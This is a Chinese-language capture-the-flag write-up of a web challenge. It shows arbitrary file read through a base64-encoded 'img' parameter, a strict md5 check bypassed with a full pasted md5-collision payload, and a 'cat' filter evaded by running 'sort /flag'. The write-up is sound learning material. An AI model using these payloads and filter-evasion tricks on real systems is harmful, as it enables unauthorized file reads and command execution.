进入之后发现是一个比较有趣的页面,啥也没,老规矩查看源码,在最后发现了一句话
感觉会和md5有关
返回当前页面,感觉这个url有点长,仔细观察
http://290ed624-6247-4599-aa59-dd6c05c6eb9d.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=
这个好像是base64的,来解码一下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PgeE7LIp-1588041288812)(https://upload-images.jianshu.io/upload_images/18308497-9ce01c3c6e196462.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]
感觉类似任意文件读取,我尝试这用同样的方法读一下flag.php
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-P6lCMj6y-1588041288813)(https://upload-images.jianshu.io/upload_images/18308497-6cbd748dbbb59c22.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]
绝壁有过滤,那我换个读读,这次读index.php
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Xwnt8xLC-1588041288814)(https://upload-images.jianshu.io/upload_images/18308497-02267e32bd8ac196.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]
发现这个文件损坏了,查看源码发现能得到base64之后的php源码
诶,首先想到昨天做的md5强类型比较,感觉先试试数组绕过
(先右键修改传参方式!!)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DyqwCF3A-1588041288814)(https://upload-images.jianshu.io/upload_images/18308497-9e82a06e9bd379f9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]
发现不太行,再看源码才发现只能用字符串0.0
此时百度强类型怎么办,几乎出来的都是固定的exp(参考https://xz.aliyun.com/t/2232)
a=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D1B%A9%11U%DD%AF%15vu%0F%DA%F6%7Dd%8B%DE%0A%AD%91r%DE%8De%07%9AC%AE%2A%BAF%DBw%BD%BB%E3%DE%E0%AD4gZ_%5C%13%1E%19F%28%7B%A8%D1%7F%2C%17%9BO%12%B4%8A%2B%DA%B9%E1%0F%0F%EBAT%07%213kujM%9DS%97%02%B3M%5DHd%DC%91%C1%AB%C3+%E8%B7_%A8%C7%D3%FDz%E8%9F%021%1E4%01%C83%12%0C%1B%8C%F6%CA%CA%CA%93K%40%5D%94%C8%AE%D0%A6%09Q%2B&b=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D1B%A9%11U%DD%AF%15vu%0F%DA%F6%7Dd%8B%DE%0A%AD%11r%DE%8De%07%9AC%AE%2A%BAF%DBw%BD%BB%E3%DE%E0%AD4gZ_%5C%13%9E%19F%28%7B%A8%D1%7F%2C%17%9BO%12%B4%0A%2B%DA%B9%E1%0F%0F%EBAT%07%213kujM%9DS%97%02%B3M%5D%C8d%DC%91%C1%AB%C3+%E8%B7_%A8%C7%D3%FDz%E8%9F%021%1E4%01%C83%12%8C%1A%8C%F6%CA%CA%CA%93K%40%5D%94%C8%AEP%A6%09Q%2B
之后是过正则,发现过滤了cat,emm我记得还可以用sort,果然直接
Sort /flag 出flag
得到flag
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-H1toGyvR-1588041288815)(https://upload-images.jianshu.io/upload_images/18308497-87ded5de5270bea6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]
(PS:网上代码审计说 这里有一个点,对于 php 来说,正则需要使用 \\ 来匹配才能匹配到反斜杠,所以实际上反斜杠还能用。或者
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ty1Q1npJ-1588041288815)(https://upload-images.jianshu.io/upload_images/18308497-3177916e3fcf4270.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]
学到了 学到了 大佬们tql)